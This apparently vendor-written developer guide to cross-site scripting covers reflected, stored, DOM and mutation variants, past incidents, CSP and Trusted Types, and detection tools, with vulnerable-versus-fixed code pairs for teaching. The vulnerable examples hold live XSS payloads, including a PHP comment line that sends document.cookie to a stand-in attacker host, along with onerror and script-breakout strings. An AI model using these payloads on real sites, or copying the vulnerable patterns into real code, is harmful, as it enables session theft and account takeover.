Cross-site scripting is the oldest browser-side vulnerability class still in regular rotation, and it remains, in 2026, the most common high-severity finding in web application bug bounty programs across HackerOne, Bugcrowd, and Intigriti. The textbook framing — reflected, stored, DOM — gives developers a starting taxonomy, but every xss attack reduces to the same single pattern: untrusted data is interpreted as code by the browser, when the developer's mental model treated the data as inert content. This guide is the pillar of our cross-site scripting cluster — the anatomy that unifies every variant, the flows of reflected, stored, and DOM-based XSS with real xss attack examples, the exotic mutation and blind variants, the OWASP A03 reorganization that absorbed XSS into injection, defense-in-depth from CSP through framework defaults, the detection coverage that catches what slips through, and the closing reminder that xss vulnerabilities are a developer fluency problem more than a tooling problem.
What Is Cross-Site Scripting and Why Does It Stay Dangerous in 2026
Cross-site scripting is a vulnerability class in which an attacker injects script — usually JavaScript, sometimes HTML or attribute payloads that activate JavaScript indirectly — into a page rendered by a victim's browser. The script runs in the origin of the vulnerable application, which means it inherits the same trust the victim's browser grants the application: cookies, session tokens, localStorage, the ability to read the DOM, the ability to call same-origin endpoints with the user's credentials. The attacker, sitting in a different origin, has effectively run code in the victim's session — without compromising the server, without phishing the victim's password, without exploiting a network-level weakness.
The class has been on the OWASP Top 10 since the list's earliest revisions. It was a standalone category through 2017 and was absorbed into the broader injection category as part of OWASP A03 in the 2021 revision — a reorganization we cover in detail in our OWASP A03 injection developer guide and the broader OWASP Top 10 2025 changes. The reorganization is conceptually correct — XSS is, formally, injection of untrusted data into an HTML/JavaScript interpreter — but operationally XSS has its own mitigation patterns, tooling, and developer fluency requirements that distinguish it from server-side injection prevention.
The reason XSS persists in 2026 — despite framework auto-escape, Content Security Policy, Trusted Types, and the moves toward server components — is that the attack surface tracks the rendering surface. Every place an application combines untrusted input with HTML or JavaScript is a potential xss vulnerability. Single-page apps shifted the surface into client-side JavaScript and exploded the DOM-based variants. Email clients render HTML with their own quirks. Embedded webviews in mobile apps render HTML in contexts where CSP is harder to enforce. Browser extensions and Electron apps execute web content with elevated privilege. The class doesn't go away because the rendering surface doesn't go away; it migrates between layers as the rendering layers themselves migrate.
The Single Pattern Under All XSS Variants
Every XSS variant — reflected, stored, DOM, mutation, blind, self — reduces to the same four-element pattern. First, an untrusted source: a request parameter, a stored database row, a URL fragment, a postMessage payload, a window.name, an injected header. Second, a rendering context in the browser: HTML body, attribute value, JavaScript context, CSS context, URL context. Third, a composition step in which the untrusted data is concatenated into HTML or JavaScript that the browser will parse. Fourth, the browser's parsing of the combined output as a structured language in which the boundary between markup and content depends on what characters appear in the content rather than on a separate channel.
The reason cross-site scripting is so persistent across rendering stacks is that the third and fourth elements are inherent to how browsers parse HTML. The HTML parser has no separate channel for "this part of the string is a literal text node, do not parse it as markup." When developer code concatenates user input into an HTML string — whether server-side via template, client-side via innerHTML, or anywhere in between — the parser cannot distinguish data from markup, and any character it treats as syntactic (<, >, ", ', &) becomes an injection vector. The same is true for JavaScript context, where untrusted data concatenated into an expression becomes evaluable code.
The remediation pattern follows from the diagnosis: provide the browser with a separate channel for code and data, so the boundary is enforced by the protocol rather than by the contents of the string. In HTML body context, that means output encoding — converting the five HTML special characters to entities so the parser treats them as text. In attribute context, it means quoting the attribute and encoding the matching quote character plus ampersand. In JavaScript context, it means JSON-encoded data dropped into a fixed expression, never raw concatenation. In URL context, it means percent-encoding plus protocol allowlisting. The pattern is the same across contexts: separate the markup channel from the data channel and use the context's encoding mechanism, not string concatenation.
The first vulnerable-versus-fixed pair below shows the simplest possible form of this principle in PHP — the language where raw HTML output is the default and developer discipline is the only thing standing between input and injection:
<?php
// Vulnerable: raw output of request parameter
echo "<p>You searched for: " . $_GET['q'] . "</p>";
// An attacker visits /search.php?q=<script>fetch('//evil.example/'+document.cookie)</script>
// The browser parses the script tag and runs it in the application's origin.
?><?php
// Fixed: HTML-encode before output
$q = htmlspecialchars($_GET['q'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
echo "<p>You searched for: " . $q . "</p>";
// The browser sees <script> as text, not as a tag.
// The five HTML special characters are converted to entities;
// ENT_QUOTES handles both single and double quotes for attribute safety.
?>The diff is small. The behavior is fundamentally different — the browser in the second form treats the parameter as text content, with no possibility of reinterpretation as markup. This is the canonical XSS fix in the simplest context, and the same pattern extends to every templating engine and rendering layer.
Reflected XSS — The Echo Chamber
Reflected XSS is the variant where the malicious payload travels in the request and is reflected — typically without persistence — into the response. The attacker crafts a URL, social-engineers the victim into clicking it, and the application echoes the URL's parameter into the rendered page where the browser parses and executes it. The payload lives in the URL; the vulnerability lives in whatever code path generates the response.
The classic flow is search results pages, error messages, and parameter-driven status indicators. A search endpoint takes ?q=... and renders "You searched for: {q}" in the response. The endpoint reflects the parameter without encoding. The attacker's link sends the victim to /search?q=<script>...</script>; the response includes the script literally; the browser executes it. Modern frameworks largely eliminate reflected XSS in HTML body context through auto-escaping, but the variant persists in three places where auto-escaping doesn't reach: legacy server-rendered code paths, error pages and 404 templates that predate the framework adoption, and any place developers use the framework's "raw HTML" escape hatch (Express's res.send with concatenated strings, Django's mark_safe, Rails's raw or html_safe, JSP scriptlets) without re-applying encoding.
Reflected XSS is the lowest-impact XSS variant on a per-victim basis — it requires the attacker to deliver the URL to each victim individually, typically through phishing or malicious advertising — but the impact per successful click is identical to stored XSS: full session compromise in the application's origin. We cover the reflected variant's flows, payload patterns, and the specific encoding rules per context in our dedicated reflected cross-site scripting developer guide, including the encoding-by-context table that maps HTML body, attribute, JavaScript, CSS, and URL sinks to their correct encoders.
Stored XSS — The Persistence Amplifier
Stored XSS is the variant where the malicious payload is written into the application's database, file system, or other persistent store, and then served back to every viewer of the affected resource. The injection happens once; the exploitation happens repeatedly, every time a user views the affected page. The amplification is what makes stored XSS the highest-severity XSS variant — a single successful injection compromises every viewer until the payload is found and removed.
The classic surfaces are user profiles (display name, bio, avatar URL), comments and forum posts, product reviews, support ticket messages, chat messages, file names in shared file managers, and any other field where one user's input is rendered to another user's browser. The 2014 eBay listing XSS case is the canonical example: attackers injected JavaScript into product listings, and every shopper who viewed the listing executed the script — credentials redirected to phishing pages, accounts hijacked, and the issue lingered for months because the listing rendering treated certain HTML as legitimate seller formatting. The pattern has recurred across every user-content platform that ever existed: the assumption that "data from the database is safe to render" produces XSS at the second use, even when the input boundary applied validation. We cover the persistence amplifier, the DOM-based stored variants in single-page apps, and the rich-text editor sanitization tradeoffs in our stored cross-site scripting developer guide.
The vulnerable-versus-fixed pair below shows the most common stored-XSS sink in vanilla JavaScript — innerHTML assignment, which parses the assigned string as HTML and creates DOM nodes from any markup it contains:
// Vulnerable: innerHTML parses the string as HTML
const comment = await fetchComment(id); // returns user-submitted text
document.querySelector('#comment-body').innerHTML = comment.text;
// If comment.text contains "<img src=x onerror=alert(1)>",
// the img tag is created and the onerror handler fires.
// Note: <script> tags inserted via innerHTML do NOT execute,
// but every other JS-bearing element (img/onerror, svg/onload,
// iframe/src=javascript:, body/onload via fragment, etc.) does.// Fixed: textContent treats the value as text, never as markup
const comment = await fetchComment(id);
document.querySelector('#comment-body').textContent = comment.text;
// The browser inserts a single text node. No HTML parsing happens.
// This is the correct fix for any comment-rendering path that
// renders plain text. For rich-text rendering, see the React
// dangerouslySetInnerHTML + DOMPurify pattern below.The fix is one identifier change. The behavioral difference is the entire vulnerability: innerHTML invokes the HTML parser; textContent never does. Every place a codebase uses innerHTML, outerHTML, insertAdjacentHTML, or document.write with non-static input is a potential stored-XSS sink, and the migration to textContent wherever rich rendering is not actually required eliminates the class by construction.
DOM-Based XSS — When the Bug Lives Entirely in the Browser
DOM-based XSS is the variant where both the source and the sink live in client-side JavaScript, with no involvement from the server in the injection path. The attacker controls a value that JavaScript reads from a source — location.hash, location.search, document.referrer, postMessage data, window.name, localStorage, sessionStorage, indexedDB, the URL fragment after a hash routing change — and writes into a sink that triggers parsing or execution: innerHTML, document.write, eval, setTimeout(string), setInterval(string), Function(...), setAttribute('src', ...) on script-bearing elements, jQuery $(...) with HTML-looking input, location = ... for javascript: URLs.
The class exploded with the rise of single-page applications because the rendering surface moved into the client. A server-rendered application that auto-escapes on output is largely safe by default; a single-page application that fetches JSON and renders it client-side has its safety determined by what the client-side code does with the data, and the client-side code has its own family of dangerous APIs — most of them documented as "unsafe with untrusted input" but used routinely with input the developer did not realize was untrusted. The DOM-based variant is now the dominant XSS pattern in modern web architectures, and we cover the source-sink taxonomy, Trusted Types as the architectural mitigation, framework-specific gotchas in React/Vue/Angular/Svelte, and the static analysis approaches in our DOM-based cross-site scripting developer guide.
The vulnerable-versus-fixed pair below shows a routing pattern that appears in single-page apps that build their own hash-based router. The hash is read, parsed, and used to render a fragment of the page — a pattern that, with naive implementation, becomes a DOM-XSS sink:
// Vulnerable: location.hash flows directly into innerHTML
function renderRoute() {
// URL like /app#/welcome<img src=x onerror=alert(1)>
const fragment = location.hash.slice(1);
document.querySelector('#view').innerHTML =
`<h1>Welcome to ${fragment}</h1>`;
}
window.addEventListener('hashchange', renderRoute);
renderRoute();
// The hash is attacker-controllable via a crafted link.
// The img tag is parsed; onerror executes in the app's origin.// Fixed: parse the route, render text via textContent
function renderRoute() {
const raw = location.hash.slice(1);
// Allowlist: only known route names, validated against a fixed map
const validRoutes = new Set(['welcome', 'profile', 'settings']);
const route = validRoutes.has(raw) ? raw : 'welcome';
const view = document.querySelector('#view');
view.replaceChildren(); // clear safely
const h1 = document.createElement('h1');
h1.textContent = `Welcome to ${route}`;
view.appendChild(h1);
}
// No HTML parsing of the hash. The route is constrained to an
// allowlist; even if an attacker injects an unknown value, it
// falls back to 'welcome' and is rendered as text via textContent.The fix combines two patterns: input validation (the route allowlist) and safe rendering (textContent over innerHTML, with explicit DOM construction). Either alone would prevent the injection in this case; both together produce defense-in-depth against future code changes that might bypass one or the other.
React, Vue, and Angular components default to safe rendering — interpolated values are escaped — and the DOM-XSS surface in those frameworks concentrates around the explicit escape hatches. React's dangerouslySetInnerHTML is named to discourage its use; the name does not prevent its use. The vulnerable-versus-fixed pair below shows the canonical fix when rich-text rendering is genuinely required:
// Vulnerable: dangerouslySetInnerHTML with raw user-supplied HTML
import React from 'react';
function CommentBody({ comment }) {
return (
<div
className="comment-body"
dangerouslySetInnerHTML={{ __html: comment.html }}
/>
);
}
// comment.html is whatever the user submitted. If they submitted
// "<img src=x onerror=stealCookies()>", the script runs.// Fixed: sanitize with DOMPurify before injecting
import React, { useMemo } from 'react';
import DOMPurify from 'dompurify';
function CommentBody({ comment }) {
const safeHtml = useMemo(
() => DOMPurify.sanitize(comment.html, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br', 'ul', 'ol', 'li'],
ALLOWED_ATTR: ['href', 'title'],
ALLOWED_URI_REGEXP: /^(?:https?:|mailto:|#)/i,
}),
[comment.html]
);
return (
<div
className="comment-body"
dangerouslySetInnerHTML={{ __html: safeHtml }}
/>
);
}
// DOMPurify parses the HTML, removes any tag/attribute not on the
// allowlist, strips javascript: URIs, neutralizes mutation XSS via
// its post-parse DOM walk. Maintained, audited, and the standard
// for client-side HTML sanitization in 2026.DOMPurify is the only HTML sanitizer this guide recommends for client-side use. Roll-your-own sanitizers fail predictably to mutation XSS payloads (covered next) because they sanitize the input string rather than the parsed-and-reserialized DOM. DOMPurify parses the HTML, walks the DOM applying the allowlist, and serializes the result — the only defense that closes the mutation-XSS class, and the reason "use DOMPurify, do not write your own" is the consensus advice across appsec.
Mutation XSS and Exotic Variants
Beyond the reflected/stored/DOM taxonomy, several exotic XSS variants matter enough to recognize in code review and exploitation reports.
Mutation XSS (mXSS) exploits the gap between how a sanitizer parses HTML and how the browser parses HTML. A sanitizer accepts an input string, applies its allowlist of tags and attributes, and produces an output string. If the browser, when later parsing the sanitizer's output, mutates the DOM in a way the sanitizer didn't anticipate — through namespace confusion, broken CDATA handling, template-tag reparsing, or noscript-context shifts — the post-mutation DOM can contain script-bearing elements the sanitizer thought it had removed. The class was named by Mario Heiderich (Cure53) around 2013 and has been a recurring source of bypasses against every major HTML sanitizer that doesn't explicitly defend against it. DOMPurify is the only widely-used sanitizer that has tracked the mutation-XSS literature continuously and patches new bypasses as they're disclosed.
Universal XSS (uXSS) is the variant where the bug lives in the browser itself, not the application — a browser flaw lets an attacker inject script into pages of any origin. uXSS is a browser-vendor problem rather than a developer problem, but it matters in this guide because it shapes the threat model: defense-in-depth assumes the browser is trustworthy, and uXSS is the case where that assumption breaks. Cross-Origin-Opener-Policy, Cross-Origin-Embedder-Policy, Site Isolation, and the architectural moves toward process-per-origin reduce uXSS impact by isolating origins more strongly at the OS process level.
Blind XSS is the variant where the reflection happens in a context the attacker cannot directly observe — typically an admin panel, an internal logging tool, a customer-support back-office. The attacker injects the payload through a public-facing field (a contact form, a support ticket subject), and the payload activates when an internal user views the entry hours or days later. The attacker discovers the vulnerability through a callback — the payload phones home with cookies, screenshots, or DOM contents from the admin context. Tools like XSS Hunter (and its successors after the original was deprecated) instrument blind-XSS testing by automating the callback infrastructure. Blind XSS is the highest-impact reflected variant because the contexts where it activates are the highest-privilege ones.
Self-XSS is the variant where the attacker tricks the victim into pasting a payload into the victim's own browser console. It's not technically a vulnerability in the application — it requires the victim's active cooperation — but it's a social-engineering vector that targets the same end state (script execution in the application origin), which is why every major application now displays "do not paste anything here" warnings when the browser console is opened. Self-XSS is a user-education problem more than a developer problem, but the warning patterns are part of the standard frontend toolkit.
Why XSS Is OWASP A03 Now — The Renaming History
Cross-site scripting was a standalone OWASP Top 10 category from the list's earliest revisions through 2017. In OWASP Top 10 2017, XSS sat at A07. The 2021 revision absorbed it into the broader injection category — A03 — alongside SQL injection, NoSQL injection, command injection, LDAP injection, and other interpreter-injection classes. The 2025 list keeps the absorption: there is no standalone "Cross-Site Scripting" category on the current OWASP Top 10. XSS is one variant of A03, and a developer reading "A03: Injection" should understand that XSS is part of what the category covers.
The reorganization is conceptually defensible. XSS is, formally, injection — untrusted data flowing into an interpreter (the browser's HTML/JavaScript parser) without a separate channel for code and data. The same anatomy that produces SQL injection produces XSS, with the interpreter swapped from a SQL engine to a browser. The unification highlights the underlying pattern, which is the right teaching frame for developers building injection fluency in general.
The reorganization also has practical drawbacks. XSS-specific mitigations — context-aware output encoding, CSP, Trusted Types, framework-level escaping, sanitization libraries — don't translate cleanly to server-side injection categories. The bug bounty taxonomy still treats XSS as its own class for severity-rubric purposes. The developer skill required to recognize XSS in unfamiliar code is distinct enough from server-side injection recognition that most teams treat them separately in code-review checklists and SAST configuration. This guide reflects that practical reality: XSS lives under A03 in the OWASP taxonomy but is treated as its own discipline because the prevention patterns are different from the rest of A03.
Real-World XSS Incidents
The XSS class has produced enough public incidents over two decades that the patterns are easy to recognize in retrospect. Four are worth remembering as the canonical case studies.
Samy worm (MySpace, October 2005). Samy Kamkar published a self-replicating XSS worm on his MySpace profile that added "Samy is my hero" to the profile of every visitor and copied itself to those visitors' profiles. The worm exploited a stored XSS in MySpace's profile-rendering code combined with insufficient input filtering on profile content. Within roughly 20 hours, the worm had infected over a million profiles — fast enough that MySpace had to take the site down to clean it. Samy was prosecuted, sentenced to community service, and the incident became the canonical example of how stored XSS plus a self-replicating payload produces internet-scale impact from a single bug. The technical writeup Kamkar published after the incident is still required reading in appsec curricula.
Twitter retweet worm (September 2010). A stored XSS in Twitter's onmouseover handler for tweet content let a payload execute when a user hovered over an affected tweet. The worm spread through retweets — viewers' browsers automatically retweeted the payload, propagating it across the network. Within a few hours, accounts including the British prime minister's office and major media outlets had retweeted the worm. Twitter patched the underlying XSS within hours, but the incident demonstrated that stored XSS plus a high-velocity social platform produces propagation patterns reminiscent of biological viruses.
eBay listing XSS (2014, ongoing through early 2016). Researchers and journalists documented stored XSS in eBay listing descriptions where attackers injected JavaScript that redirected shoppers to phishing pages designed to look like eBay's login. The vulnerability persisted across multiple disclosures and took months to fully remediate, in part because the listing-rendering pipeline accepted certain HTML for legitimate seller formatting and the boundary between "allowed seller HTML" and "injected attacker HTML" was porous. The eBay case is the canonical reminder that rich-text rendering surfaces — anywhere users render formatted content to other users — are stored-XSS magnets unless sanitized through a maintained library.
British Airways Magecart (2018). The breach that exposed roughly 380,000 payment card details — initially fined £183 million by the ICO, later reduced to £20 million — was a Magecart-style attack in which a third-party JavaScript library on the BA checkout was modified to skim payment card data. While Magecart is more accurately a supply-chain attack than classic XSS, the underlying mechanism — attacker-controlled JavaScript executing in the application's origin and reading form data — is XSS-class behavior, and the defenses (CSP with strict-dynamic, Subresource Integrity, Trusted Types) are XSS defenses. Magecart is the modern XSS shape: not a payload in a comment field, but a compromise of a legitimate script the application loads. The defense-in-depth implications connect XSS prevention to the supply-chain integrity discipline covered in our software and data integrity failures (A08) guide.
Defense-in-Depth — The XSS Mitigation Stack
The variants and incidents above converge on a small set of mitigation patterns that, layered together, eliminate the vast majority of xss vulnerabilities. No single layer is sufficient; the layering is what catches what each individual layer misses. The full layered approach — CSP nonces and strict-dynamic, Trusted Types, output encoding by context, sanitization for rich text, framework defaults, and the migration patterns to adopt them — is the subject of our dedicated XSS prevention defense-in-depth developer guide. The summary stack below names the layers and the role each plays.
Layer 1: Output encoding by context. Every place the application combines untrusted data with HTML, the data is encoded for the specific context — HTML body, attribute, JavaScript, CSS, URL. The encoding is sink-specific; a string safe for HTML body is not safe for JavaScript context, and a string safe for JavaScript is not safe for URL context. Modern templating engines apply context-aware auto-escaping when the context is determined at parse time; developers reach for the framework's auto-escape and avoid the raw-output escape hatches.
Layer 2: Framework-level safe-by-default rendering. React, Vue, Angular, and Svelte all default to escaping interpolated values. The framework treats interpolated expressions as text; HTML insertion requires an explicit escape hatch (dangerouslySetInnerHTML, v-html, [innerHTML], {@html}). The default-safe rendering eliminates most XSS by construction; the residual surface is the explicit escape hatches, which appear in code review as a finding to justify case by case.
Layer 3: HTML sanitization for rich-text rendering. Where the application genuinely needs to render user-supplied HTML — comments with formatting, rich-text editor output, email previews — a maintained sanitization library (DOMPurify on the client, the equivalents in server frameworks) parses the HTML, applies an allowlist of tags and attributes, strips dangerous URI schemes, and serializes the result. Roll-your-own sanitizers fail to mutation XSS predictably; the maintained libraries track the bypass literature and patch as needed.
Layer 4: Content Security Policy. CSP is the runtime control that limits what scripts the browser will execute. A strict CSP — with nonces or hashes for inline scripts, strict-dynamic for transitive script loading, 'unsafe-inline' never used in script-src, 'unsafe-eval' never used in script-src — turns successful XSS injection into a non-event because the injected script doesn't match the policy and the browser refuses to execute it. CSP is defense-in-depth, not a primary mitigation — it doesn't replace output encoding — but it shrinks the impact of an XSS bypass to "the script tries to run and is blocked," which is the difference between a P1 incident and a logged event. CSP overlaps with the broader configuration discipline in our security misconfiguration deep dive.
Layer 5: Trusted Types. A Chrome-and-Edge feature (with Firefox support landing in stable in 2025) that requires DOM sinks to receive Trusted Type objects rather than strings. With Trusted Types enforced, element.innerHTML = userInput throws — the assignment requires a TrustedHTML object produced by an explicitly registered policy. The architectural effect is that the application's DOM-XSS surface narrows from "every innerHTML assignment in the codebase" to "the Trusted Types policy registrations" — a much smaller surface to audit and lock down. Trusted Types is the strongest single architectural mitigation against DOM XSS in modern browsers, and adoption is the recommended path for new applications and the gradual-migration target for existing ones.
Layer 6: HttpOnly and Secure cookies. Marking session cookies HttpOnly means JavaScript cannot read them via document.cookie; an XSS payload that runs in the page can no longer exfiltrate the session token directly. The mitigation does not prevent XSS — the payload still runs same-origin and can issue authenticated requests on the user's behalf — but it shrinks the post-XSS impact and forces the attacker into in-session attacks rather than session theft. Secure ensures the cookie is only sent over HTTPS; SameSite=Lax or Strict mitigates the CSRF angle. The cookie attributes are a five-minute change with disproportionate downstream effect.
The vulnerable-versus-fixed pair below shows a pattern that combines several of these layers — JSON injection into an inline script context, a sink that auto-escaping doesn't handle correctly because the context is JavaScript rather than HTML:
<!-- Vulnerable: JSON.stringify in a script tag, with the assumption that
the result is "JavaScript-safe" because it's a JSON object -->
<script>
var initialState = ${JSON.stringify(serverData)};
</script>
<!-- If serverData contains the string "</script><script>alert(1)</script>",
JSON.stringify produces ""</script><script>alert(1)</script>"",
which closes the script tag and opens a new one. The HTML parser
wins over the JSON parser; injection succeeds. --><!-- Fixed: serialize JSON to a data attribute, parse on the client -->
<div id="bootstrap" data-state="${
htmlEncodeAttr(JSON.stringify(serverData))
}"></div>
<script>
var initialState = JSON.parse(
document.getElementById('bootstrap').dataset.state
);
</script>
<!-- The JSON is rendered as an HTML attribute value, encoded for
attribute context (ampersand and the matching quote escaped).
The script reads it via dataset and parses it with JSON.parse.
The HTML parser never sees the JSON contents as markup, and
the JSON parser never sees the contents as JavaScript. -->
<!-- Alternative fix when the data must inline into the script:
escape </, <!, and U+2028/U+2029 in the JSON string before
embedding. Frameworks like Next.js do this automatically in
the __NEXT_DATA__ script. -->The fix relocates the data into an HTML attribute — a context where attribute encoding is straightforward and well-understood — and parses it on the client. The sink-mismatch problem (HTML parser vs JSON parser disagreeing on where the boundary is) is eliminated because the data and the script are in different contexts. Frameworks that bootstrap server state into client JavaScript should use this pattern by default, and most modern ones (Next.js, Remix, Nuxt, SvelteKit) do.
XSS Detection — SAST, DAST, IAST, WAFs
Detection of xss vulnerabilities runs across multiple complementary tools. Each catches a different slice; the layering is what produces strong coverage. The tradeoffs across tool categories are documented in our IAST vs DAST vs SAST comparison guide.
SAST. Source-code scanners trace data flow from input sources to DOM/HTML sinks. SAST catches the syntactic patterns reliably — innerHTML assignment with non-static input, dangerouslySetInnerHTML with non-sanitized input, raw template output without auto-escape, eval/Function/setTimeout-string with input. CodeQL, Semgrep, Snyk Code, and SonarQube all ship XSS rule packs that catch the common patterns. The weakness is false positives on inputs that have upstream sanitization the scanner cannot prove, and false negatives on framework-specific sinks the scanner doesn't model. SAST is the right tool for "every PR that touches a rendering path" and the wrong tool for "is this specific dangerouslySetInnerHTML safe in production."
DAST. Black-box scanners send XSS payloads at the running application and observe whether the payloads activate. DAST catches the runtime behavior — the actual response when an injection payload reaches a browser parser. OWASP ZAP and Burp Suite are the standard, with extensive XSS payload libraries and the ability to detect reflected XSS reliably and stored XSS through a fuzz-then-verify second pass. DAST struggles with DOM XSS because the bug lives entirely client-side; specialized DOM-XSS scanners (DOMinator, Burp DOM Invader) instrument the browser to catch source-to-sink flow during scanning.
IAST. Instruments the running application and observes data flow during test execution. IAST combines SAST's source-to-sink tracing with DAST's runtime confirmation. Contrast Security, Seeker, and Hdiv all ship XSS detection. The strength is high-confidence findings with low false-positive rates; the weakness is the instrumentation overhead and the requirement for representative test traffic.
WAFs and runtime protection. Web Application Firewalls block injection payloads at request time. WAF XSS rules catch obvious payload signatures — the <script> tags, the javascript: URIs, the onerror attributes — but miss obfuscated payloads, payloads in unusual encodings, and DOM-XSS entirely. WAFs are defense-in-depth, not primary mitigation. The recurring lesson from public bypasses (every major WAF has had public bypass writeups) is that WAF rules lag the payload literature and that a program relying on WAF as the primary XSS defense has misallocated investment.
Code review with an XSS lens. Every PR that touches a rendering path includes an explicit review for XSS — output encoding is in place, the framework's escape hatch is justified, the sanitizer's allowlist matches the use case, the CSP doesn't have unsafe-inline. Secure code review with an XSS-specific checklist consistently catches the class; review without one consistently misses it. The combination of SAST in CI on every PR, DAST in CI/CD on every staging deployment, IAST in long-running test environments, and code review with an XSS lens is the pattern that produces the strongest coverage in 2026.
The relationship between XSS and CSRF — the other classic browser-side attack class — is a frequent source of developer confusion. The two are different: XSS injects script into the application origin; CSRF tricks the user's browser into making authenticated requests to the application from a different origin. The defenses are largely orthogonal (output encoding for XSS, SameSite cookies + CSRF tokens for CSRF), and we cover the comparison in detail in our XSS vs CSRF comparison guide.
Scanners Find XSS. Developers Stop Writing It.
A SAST tool that flags an unsafe innerHTML assignment in CI is better than discovering the vulnerability six months later in a bug bounty report — but neither is as good as a developer who would never have written the assignment in the first place. SecureCodingHub builds the context-aware encoding, framework-defaults, and CSP-aware fluency that turns cross-site scripting from a recurring scanner finding into something developers catch themselves at code-review time. If your team is tired of every pentest producing another reflected XSS, stored XSS, or DOM-XSS report, we'd be glad to show you how our program changes the input side of that pipeline.
See the PlatformClosing — XSS Is a Developer Skill, Not a Tooling Problem
The XSS variants in this guide — reflected, stored, DOM, mutation, blind, self — appear superficially different. The injection vectors differ, the payloads differ, the tooling that detects each differs. The underlying pattern is identical: untrusted data is concatenated into HTML or JavaScript, the browser parses the combined output as a structured language, and because the boundary between data and code is encoded in the string's contents rather than in a separate channel, the attacker controls a portion of the contents and uses that control to redraw the boundary in a way the developer did not intend.
The mitigation is identical too. Provide a separate channel. Use the context's encoding mechanism. Apply the framework's safe-by-default rendering. Reach for sanitization (DOMPurify) only when rich-text rendering is genuinely required, and reach for the framework escape hatch only with sanitized input and a code-review justification. Layer CSP with strict directives so a successful injection becomes a blocked policy event rather than a session compromise. Adopt Trusted Types in new code. Mark session cookies HttpOnly, Secure, SameSite. Apply the discipline at every boundary where untrusted input flows toward a rendering surface.
Cross-site scripting is ranked under A03 not because it has been solved — the bug bounty data in 2026 says decisively otherwise — but because the prevention has been a known engineering discipline for two decades. The teams that have largely closed their XSS surface share a small set of practices: framework defaults that escape by construction, maintained sanitization libraries, CSP enforced in production, Trusted Types adopted in new code, code review with an XSS-aware checklist, and SAST/DAST/IAST layered to catch what review misses. None of those practices is exotic; the institutional commitment to apply them consistently is. That fluency is what secure-coding training is for, and it is the difference between a program that detects XSS in CI and a program that no longer ships XSS in the first place.